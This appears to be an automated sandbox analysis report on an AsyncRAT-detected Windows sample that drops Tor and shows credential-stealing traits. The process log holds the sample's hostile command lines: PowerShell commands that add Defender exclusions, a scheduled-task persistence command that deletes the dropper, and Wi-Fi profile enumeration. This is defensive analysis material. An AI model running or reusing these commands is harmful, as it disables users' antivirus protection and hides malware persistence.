Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E0855	25_2_6C1E0855
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CC8B0	25_2_6C1CC8B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1868E7	25_2_6C1868E7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1C8900	25_2_6C1C8900
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CC94C	25_2_6C1CC94C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1849FB	25_2_6C1849FB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DCA10	25_2_6C1DCA10
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184A26	25_2_6C184A26
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E2A50	25_2_6C1E2A50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FAA80	25_2_6C1FAA80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184AA0	25_2_6C184AA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FAAEC	25_2_6C1FAAEC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1C8B1B	25_2_6C1C8B1B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18EB00	25_2_6C18EB00
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2A2B10	25_2_6C2A2B10
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C188B90	25_2_6C188B90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DABB0	25_2_6C1DABB0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C182BA0	25_2_6C182BA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FABC0	25_2_6C1FABC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C188BC7	25_2_6C188BC7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184439	25_2_6C184439
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18E4B0	25_2_6C18E4B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D0550	25_2_6C1D0550
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184568	25_2_6C184568
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18656C	25_2_6C18656C

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll 3F08728C7A67E4998FBDC7A7CB556D8158EFDCDAF0ACF75B7789DCCACE55662D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll 91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585

PE / OLE file has an invalid certificate

Source: yt7dW9nyJK.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000000.2037582727.0000000000190000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamexsUpf.exe2 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.000000000060E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2070321293.0000000004C90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000416000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe

Source: yt7dW9nyJK.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: yt7dW9nyJK.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ffmaba.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ffmaba.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	Base64 encoded string: 'MOSjuEXWGCeuUSbv59lDTULs6LFzvYBZH41XkH9yEnDH7YwG5FS0lU64qKjFIPxSZpHgdykYYHkwwAPCb9a5', 'z927ITnSLvRzj6sT0oOQMfxrxePFr4FY7CtHEfOCy3RNRV9CrFoM012BQrHryb3GaEBoxMvKfSq55HIioVkW', 'wkAWgkm9Hq2LUhSApfaGA28Wew5QwxbHuJWGf6GqJHYPfZVOezyZbbLKPk6wOm1dBzMzGxUgIqOhoYfFklgz', 'QCnV4dACN1BDItDwaUKx14Lp3DW9zGfceYG8TrMw92CYFgR9mSa5y4aJCRbCkT4RWuTPN9eptSbPkdWF4emv', 'MllONkDpSW15sVE95prffePmO6NzN5kLSBPsHqqXjtJa0cqfAZPPVSgTl6hiIS6jrBigR4aGyDWPAIVGnr3a', 'yuyROimEtBGgmCQLmPtckzOCDnB9dYPpwiT2g6yI2X6LzGEvML1LQE1j6DMuKhcGFTnnBxQSrJkQfv1YL8Wq', 'kNuuvkCHSOJumFXu0kJYwCQsNlifJrPhlp5sVGzV4GfncK7B4kSPQ8aFEyXg7WBxQEXrlasbdDQ6PUcOFIvq', 'i3ahtLaj6i8OccGnyo30tks0QcCQVfj0XTjILBXzogkUW46MUl8BLmYoEYDoNp7oExTWWK5DEmsVsd9hPteI', 'qGJs5j7hUjde1Dbk7Ahg9thP3jkBeHBp25FT1k0irlmFNPYP04ljLjVxUksZSizkITDnct1IVqHtQYS64iPB', 'kyGILSjU2WVbQG2s46RJTpZOOXbYZoHnzpbY5gRsq1FNEmtlyfU6KaEnt7FXE5WS17Kf4v4XRCi0PJfcZsLl', 'lu2uXyYJbcwZGZyhkXgB2Si3cRdthfqYlNM6gKCqvvVF4GgOto46VKPTwkBwyKlw8R7jntyNEImcMKrrQ3gJ', 'jObCmCT5ZWuaGkeSVM47Z1ErEm2oe5O8QZ9UVIhdWoJWyaSJciGLGwMxlwD8wNwyQsKyizcmNjpHJZZGgWDs', 'SpE7me7kN6nXKVa0rJQsWYcK0UnI8MxzDRWUfMV1TjSEHWT6hi5UDvTs71HVgtmnIJdol37UDfgEGa6dGYwV'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	Base64 encoded string: 'MOSjuEXWGCeuUSbv59lDTULs6LFzvYBZH41XkH9yEnDH7YwG5FS0lU64qKjFIPxSZpHgdykYYHkwwAPCb9a5', 'z927ITnSLvRzj6sT0oOQMfxrxePFr4FY7CtHEfOCy3RNRV9CrFoM012BQrHryb3GaEBoxMvKfSq55HIioVkW', 'wkAWgkm9Hq2LUhSApfaGA28Wew5QwxbHuJWGf6GqJHYPfZVOezyZbbLKPk6wOm1dBzMzGxUgIqOhoYfFklgz', 'QCnV4dACN1BDItDwaUKx14Lp3DW9zGfceYG8TrMw92CYFgR9mSa5y4aJCRbCkT4RWuTPN9eptSbPkdWF4emv', 'MllONkDpSW15sVE95prffePmO6NzN5kLSBPsHqqXjtJa0cqfAZPPVSgTl6hiIS6jrBigR4aGyDWPAIVGnr3a', 'yuyROimEtBGgmCQLmPtckzOCDnB9dYPpwiT2g6yI2X6LzGEvML1LQE1j6DMuKhcGFTnnBxQSrJkQfv1YL8Wq', 'kNuuvkCHSOJumFXu0kJYwCQsNlifJrPhlp5sVGzV4GfncK7B4kSPQ8aFEyXg7WBxQEXrlasbdDQ6PUcOFIvq', 'i3ahtLaj6i8OccGnyo30tks0QcCQVfj0XTjILBXzogkUW46MUl8BLmYoEYDoNp7oExTWWK5DEmsVsd9hPteI', 'qGJs5j7hUjde1Dbk7Ahg9thP3jkBeHBp25FT1k0irlmFNPYP04ljLjVxUksZSizkITDnct1IVqHtQYS64iPB', 'kyGILSjU2WVbQG2s46RJTpZOOXbYZoHnzpbY5gRsq1FNEmtlyfU6KaEnt7FXE5WS17Kf4v4XRCi0PJfcZsLl', 'lu2uXyYJbcwZGZyhkXgB2Si3cRdthfqYlNM6gKCqvvVF4GgOto46VKPTwkBwyKlw8R7jntyNEImcMKrrQ3gJ', 'jObCmCT5ZWuaGkeSVM47Z1ErEm2oe5O8QZ9UVIhdWoJWyaSJciGLGwMxlwD8wNwyQsKyizcmNjpHJZZGgWDs', 'SpE7me7kN6nXKVa0rJQsWYcK0UnI8MxzDRWUfMV1TjSEHWT6hi5UDvTs71HVgtmnIJdol37UDfgEGa6dGYwV'

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.AddAccessRule
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.AddAccessRule
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@67/78@7/14

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yt7dW9nyJK.exe.log

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Mutant created: \Sessions\1\BaseNamedObjects\SXVvkYHBJwlTYefsyEntPmgFop
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Mutant created: \Sessions\1\BaseNamedObjects\dkm6mrq0hw
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Mutant created: \Sessions\1\BaseNamedObjects\kAU1GvVR3izXMfie
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzwpiuff.jmv.ps1

Source: yt7dW9nyJK.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: yt7dW9nyJK.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E83000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: yt7dW9nyJK.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
